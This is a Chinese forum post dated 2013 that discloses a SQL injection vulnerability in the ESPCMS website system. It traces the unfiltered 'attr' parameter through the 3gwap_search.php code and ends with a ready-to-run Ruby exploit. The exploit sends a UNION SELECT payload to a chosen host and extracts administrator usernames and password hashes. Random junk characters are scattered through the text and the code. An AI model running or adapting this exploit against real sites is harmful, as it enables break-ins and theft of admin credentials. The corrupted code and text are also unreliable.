0×0 漏洞概述0×1 漏洞细节
, t& `& G; a; D4 p- o. V& u0×2 PoC
+ v/ `# K+ ^' X6 d X) w1 ^) R2 ?' J
9 m8 L- W+ I5 |9 S* Q1 h) M% Q( t- s
0×0 漏洞概述
M5 S: X& [0 d# E4 ~# ?, A9 Z* O+ Z' {! X. H5 X! x
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。( P. H) D1 j3 W- X4 h
其在处理传入的参数时考虑不严谨导致SQL注入发生
( w# C" f$ J" H/ c) J7 I9 g, P# ?3 @
* p6 @' P V; R7 \6 z2 `3 @0×1 漏洞细节
9 C& Q. i$ a% H" \8 x5 E$ i- w
; f; M' R0 z t3 T; R) c变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
% h) {" l4 t1 Y5 ?5 k$ z正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
& p+ Q. S7 d! U. _- q# X而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。" h B) g" y+ a. v' `% T
1 I6 B$ e$ C5 Y5 y: ` a
在/interface/3gwap_search.php文件的in_result函数中:9 C5 ~; O. D2 \- M3 @; Y
/ d* g1 q, ]3 O
) L) o4 s/ Y' E8 l7 f8 i
* F: I0 o+ L- @& r, `. X function in_result() {7 e% p+ J0 B( y7 T' \" o$ p
... ... ... ... ... ... ... ... ...
& a8 ~1 w2 \: D $urlcode = $_SERVER[ 'QUERY_STRING '];
" X4 G" { h2 O3 D parse_str(html_entity_decode($urlcode), $output);; F% {) O* @4 r+ w [
& A3 h, @! n4 I2 p: Y- R
... ... ... ... ... ... ... ... ... ^" x3 T6 V1 P2 i/ m+ T4 C' M# o
if (is_array($output['attr' ]) && count($output['attr']) > 0) {- G) `, Z7 V1 d( c
* W+ i: N$ c) b/ a
$db_table = db_prefix . 'model_att';, o5 a" X( ?' ?) Z) N
, A$ d6 m) k! I- A. Q% {# J foreach ($output['attr' ] as $key => $value) {+ W& e6 M: _* y5 h% l6 r
if ($value) {- ]: V* s* [* v* q. k
% J% w, a- ]! p8 m j9 R $key = addslashes($key);
V2 v# L8 C3 m9 F* i. [9 D $key = $this-> fun->inputcodetrim($key);- Z$ E. G) z' t3 e) { M5 A. ^
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
# ]8 v) M$ t7 M4 ]4 X $countnum = $this->db_numrows($db_table, $db_att_where);
D/ e& [# Q ^) w% L if ($countnum > 0) {
' Z6 Y$ k2 H% l% X% Z! ]0 b $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
5 |4 S) }/ K) q3 U; g6 y( \ }
5 ?% z9 J- g, ^' B1 j }
6 ]) |% e7 L- `& \; I) Z8 B- F* ` }
# K- c' z9 H' _ }8 a: _* V$ O/ p ]9 b! X, e/ f5 ~
if (!empty ($keyword) && empty($keyname)) {+ {3 z( Z9 S! \* Y6 j: |$ M' B. b
$keyname = 'title';. ^8 ]& C/ Z; ?" g/ I/ Q* Y
$db_where.= " AND a.title like '%$keyword%'" ;! }: I0 }' K) ^, i, p$ g: U3 J8 C# m
} elseif (!empty ($keyword) && !empty($keyname)) {- ~: h* G6 X: V5 U6 u8 g
$db_where.= " AND $keyname like '% $keyword%'";
. C# C$ Y: P, W$ c, F; t- Z; v; T }; M5 Z, e; l" ?" z* c
$pagemax = 15;$ N2 i0 Y7 [& q& N S& A
0 @- a. Z4 U+ n/ [9 R $pagesylte = 1;$ V! q" K$ b( ]
* d0 T$ H6 K" K, |* Z2 _7 K2 m7 [ if ($countnum > 0) {
. y( S1 q/ L% `$ g* z) |, d
- K! _- G% b3 ?* m1 L9 V# j- R $numpage = ceil($countnum / $pagemax);. ]- @% _& @# H/ n# B. Y( g
} else {, T1 r, U0 O k# a
$numpage = 1;! K0 `5 D- l% t' b# \+ C; b: r! ]
}. [( s! C4 y) k7 w4 h
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;$ z4 f/ s. z) n, r3 g
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
9 v1 r& C- _/ [! W$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);% v# k4 p( W- ^6 e9 B
... ... ... ... ... ... ... ... ...
, I' W$ E) Y. ?/ ` }, T) o7 j7 O, O) |$ t2 I+ `, ]2 e8 U& a
' S$ j. L" M7 B+ r8 c( K- `3 K
( |" N2 a: W5 e e8 q0×2 PoC
g# {4 H. F0 v: Y
. H/ ?- o& \% g% Q0 Z0 O& D$ A0 o9 g* B
! |9 |4 Q" |. y ?4 _: P, l
/ f. S3 J! O! Q# Z: E' K9 Trequire "net/http"9 y- }1 O* Z: i/ Y* o3 _
1 S" h, j# @( [+ Y& I
def request(method, url)) M# H8 Z4 \# X8 V: }- C
if method.eql?("get")4 R8 f; V" N6 h! z0 R' e, }
uri = URI.parse(url)
) P6 }( u4 P( I; A5 w% X4 l http = Net::HTTP.new(uri.host, uri.port)
" [! p6 X( L1 ^+ n3 E' f response = http.request(Net::HTTP::Get.new(uri.request_uri))/ Z7 H1 O% L g4 ?
return response) [ P4 o: ^ Y( B
end
: `2 K# q3 F3 r: @end4 s4 Z) w5 W# h: H* p- _1 x
; x! n) J& F+ z0 Odoc =<<HERE
6 J9 A+ @, \% P: M-------------------------------------------------------$ b9 y! U; C) |6 g3 I# }
Espcms Injection Exploit3 T* L2 r% L4 v, C/ h. f
Author:ztz) {; e3 a( J' q. v! K N4 a
Blog:http://ztz.fuzzexp.org/) \9 u0 w3 K3 F1 \0 p) T8 P
-------------------------------------------------------
6 J1 ^0 S$ C: l, A& S7 s! i: }" J, x
HERE
* V6 G/ P: R$ J; l! v
4 K I: D' z" P1 r' Dusage =<<HERE3 V# w8 D; }5 c% X
Usage: ruby #{$0} host port path
3 G6 F, I, D$ I. o+ H6 Pexample: ruby #{$0} www.target.com 80 /$ Y. p' ]8 S5 o# R5 V
HERE9 t: ?! j$ R$ T7 E
6 w! }/ z+ k" F& x
puts doc
, i1 ?! e4 u8 p. `) O* k8 M# Mif ARGV.length < 3+ D( Z/ {% j# S3 @: I1 Z4 F! v/ }
puts usage
1 p$ ` I& j5 v0 celse, K* M: v- E4 h
$host = ARGV[0]( Y, ]) M: } @# O
$port = ARGV[1] i6 M& V; A. U; o6 n0 X& w4 {
$path = ARGV[2]! J6 D t4 c: m; Q5 A# P) M) {
$ b0 x6 Q0 c& [4 s puts "send request..."
6 @/ x' s) j! ]5 K" [ url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&2 E4 j/ y8 X# p7 a, k! p1 R
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
# W3 d6 A; o1 t5 e+ S2 u( l,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27, S! n9 |) p& N7 M) E- J
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
/ y6 ^8 @: h; A& }% _ response = request("get", url)
( v& X l& T! |1 D8 U8 m# R) B result = response.body.scan(/\w+&\w{32}/)
4 n) P: C( M5 @, I+ S$ R puts result
1 F: {( L/ S! T: Y: U$ ~end+ D6 F c1 S/ U2 z0 }
$ ^( F7 p9 O9 E, V |
发表于 2013-7-27 18:31:52
收藏
支持
反对